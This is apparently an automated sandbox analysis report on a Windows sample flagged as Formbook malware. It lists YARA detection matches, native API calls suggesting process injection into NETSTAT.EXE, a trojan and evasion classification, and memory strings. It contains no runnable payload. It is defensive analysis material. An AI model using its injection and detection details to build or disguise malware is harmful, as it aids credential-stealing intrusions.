          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE82E0 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE8260 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE825A NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BCB48
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BCB47
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025B9FD8
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_07408730
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_07400558
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_0740CF68
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_07405FE0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_07405D98
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_07407C00
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_074099D8
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_07403880
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_0740B6D1
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_0740B6E0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_074086A0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041A2A6
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00408C50
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041B4A6
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041C7C2
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119F900
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B4120
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126E824
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251002
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AB090
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012620A8
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012628EC
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01262B28
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BAB40
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CEBB0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125DBD2
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012503DA
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0124FA2B
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012622AE
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01262D07
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01190D20
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01261D55
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2581
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AD5E0
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012625DD
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A841F
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125D466
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01261FF1
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126DFCE
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B6E30
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125D616
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01262EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE1FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDDBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE2B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE22AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B36E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE25DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B10D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE2D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE20A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE28EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BD1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDD466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEA2A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEB4A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FD8C50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FD8C4B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FD2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FD2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEC7C2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FD2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03B1B150 appears 35 times
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: String function: 0119B150 appears 48 times
          Source: 8sxgohtHjM.exe, 00000000.00000002.269902767.0000000000442000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAssemblyTitleAttribute.exeB vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exe, 00000000.00000002.270751775.000000000271E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exe, 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exe, 00000003.00000002.268222469.0000000000352000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAssemblyTitleAttribute.exeB vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exe, 00000004.00000000.268910587.0000000000772000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAssemblyTitleAttribute.exeB vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exe, 00000004.00000002.311350228.000000000128F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exe, 00000004.00000002.311207883.0000000001090000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exeBinary or memory string: OriginalFilenameAssemblyTitleAttribute.exeB vs 8sxgohtHjM.exe
          Source: 8sxgohtHjM.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8sxgohtHjM.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@6/1@14/6
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8sxgohtHjM.exe.logJump to behavior
          Source: 8sxgohtHjM.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
